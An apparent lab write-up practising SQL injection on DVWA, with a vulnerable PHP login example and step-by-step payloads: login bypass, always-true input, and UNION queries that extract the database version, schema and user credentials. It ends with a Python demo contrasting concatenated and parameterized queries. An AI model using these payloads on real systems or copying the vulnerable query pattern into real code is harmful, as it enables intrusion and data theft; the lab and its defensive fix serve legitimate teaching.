
MODULE-2 EXPERIMENT-1
Objective: SQL Injection: Use DVWA to practice SQL injection attacks. Demonstrate how an attacker can manipulate input fields to extract, modify, or delete database information.

Q. What is SQL injection (SQLi)?
It is a technique where SQL code/statements are inserted into an application's input fields so that they become part of the query the application executes, with the aim of altering the database contents, dumping useful database contents to the attacker, causing repudiation issues, spoofing identity, and much more.

Process: Let's take a simple scenario where we have a web application with a login form with username and password fields. If the developer used PHP for development, the code would look like this:

<?php
// Vulnerable: the raw POST values are concatenated straight into the SQL string.
$query = "SELECT * FROM users WHERE username = '" . $_POST['username'] . "'";
$query .= " AND password = '" . $_POST['password'] . "'";
?>

If a user UTKARSH with the password '12345' wanted to log in, after clicking the Submit or the Log in button, the query that would be sent to the database would look like this:
SELECT * FROM users WHERE username='UTKARSH' AND password='12345'

If an attacker knew the username and wanted to bypass the login window, they would put something like UTKARSH'; -- in the username field. The resulting SQL query would look like this:
SELECT * FROM users WHERE username='UTKARSH'; -- ' AND password='1111'

What the attacker has done is add the -- (double-dash), which comments out the rest of the SQL statement. The password condition is never evaluated, so whatever was entered in the password field is ignored and the attacker bypasses the login screen.

Step 1: Setup DVWA for SQL Injection: open 127.0.0.1/dvwa/login.php and log in using the username "admin" and the password "password". These are the default DVWA login credentials. After a successful login, set the DVWA security level to LOW, then click on SQL Injection in the left-side menu.

Step 2: Basic Injection: In the User ID field, enter "1" and click Submit. That is supposed to print the ID, First_name, and Surname on the screen. The SQL statement being exploited here is:

$getid = "SELECT first_name, last_name FROM users WHERE user_id = '$id'";

When you check the URL, you will see there is an injectable parameter, which is the ID. Currently, my URL looks like this:
http://172.16.15.128/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#

Let's change the ID parameter of the URL to a number like 1, 2, 3, 4, etc. That will also return the First_name and Surname of all users as follows:
ID: 2 | First name: Gordon | Surname: Brown
ID: 3 | First name: Hack | Surname: Me
ID: 4 | First name: Pablo | Surname: Picasso

If you were executing this command directly on the DVWA database, the query for User ID 3 would look like this:
SELECT first_name, last_name FROM users WHERE user_id = '3';

Step 3: Always True Scenario: A more advanced method to extract all the First_names and Surnames from the database would be to use the input:
%' or '1'='1

The condition user_id = '%' matches no row (with =, the % sign is a literal, not a wildcard), so it is false. The '1'='1' condition is always true since 1 will always equal 1, so every row is returned. If you were executing that on a database, the query would look like this:
SELECT first_name, last_name FROM users WHERE user_id = '%' or '1'='1';

Step 4: Display Database Version: To know the database version the DVWA application is running on, enter the text below in the User ID field.
%' or 0=0 union select null, version() #
The database version will be listed under Surname in the last line of the output.

Step 5: Display Database User: To display the database user that executed the PHP code powering the database, enter the text below in the User ID field.
%' or 0=0 union select null, user() #

Step 6: Display Database Name: we will inject the SQL code below in the User ID field.
%' or 0=0 union select null, database() #
The database name is listed next to the Surname field in the last line.

Step 7: Display all tables in information_schema: use the text below.
%' and 1=0 union select null, table_name from information_schema.tables #

Step 8: Display all the user tables in information_schema: enter the SQL code below.
%' and 1=0 union select null, table_name from information_schema.tables where table_name like 'user%' #

Step 9: Display all the column names of the users table, via information_schema:
%' and 1=0 union select null, concat(table_name,0x0a,column_name) from information_schema.columns where table_name = 'users' #

Step 10: Display column field contents:
%' and 1=0 union select null, concat(first_name,0x0a,last_name,0x0a,user,0x0a,password) from users #
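The following is an added example, not part of the original writeup or of DVWA itself. It rebuilds the $getid pattern from Step 2 (and the same string-concatenation defect in the login form of the Process section) against a constructed in-memory SQLite table, so the always-true and union inputs from Steps 3 and 4 can be run side by side with a hardened, parameterized version. SQLite is assumed instead of MySQL, so the union input uses -- as the comment marker and sqlite_version() in place of # and version().

```python
import sqlite3

# Constructed sample rows, mirroring the users the DVWA walkthrough lists (ids 2-4).
SAMPLE_USERS = [
    (2, "Gordon", "Brown"),
    (3, "Hack", "Me"),
    (4, "Pablo", "Picasso"),
]


def make_db():
    """In-memory stand-in for the DVWA users table (constructed, not DVWA's real schema)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (user_id INTEGER, first_name TEXT, last_name TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", SAMPLE_USERS)
    return conn


def build_vulnerable_sql(user_id):
    """Same pattern as DVWA's $getid: the id is pasted straight into the SQL text."""
    return f"SELECT first_name, last_name FROM users WHERE user_id = '{user_id}'"


def lookup_vulnerable(conn, user_id):
    """Runs the concatenated query; whatever SQL the id contains is executed."""
    return conn.execute(build_vulnerable_sql(user_id)).fetchall()


def lookup_safe(conn, user_id):
    """Hardened form: allowlist the id as digits, then bind it as a parameter.

    The driver sends the value separately from the SQL text, so quotes,
    'or', 'union' and comment markers inside it are never parsed as SQL.
    """
    user_id = str(user_id)
    if not user_id.isdigit():
        return []  # reject anything that is not a plain integer id
    query = "SELECT first_name, last_name FROM users WHERE user_id = ?"
    return conn.execute(query, (int(user_id),)).fetchall()


if __name__ == "__main__":
    db = make_db()
    for payload in ("2", "%' or '1'='1", "%' and 1=0 union select null, sqlite_version() --"):
        print(repr(payload))
        print("  vulnerable:", lookup_vulnerable(db, payload))
        print("  safe      :", lookup_safe(db, payload))
```

Running it shows the concatenated query returning every user for the always-true input and the engine version for the union input, while the parameterized version returns rows only for a plain numeric id.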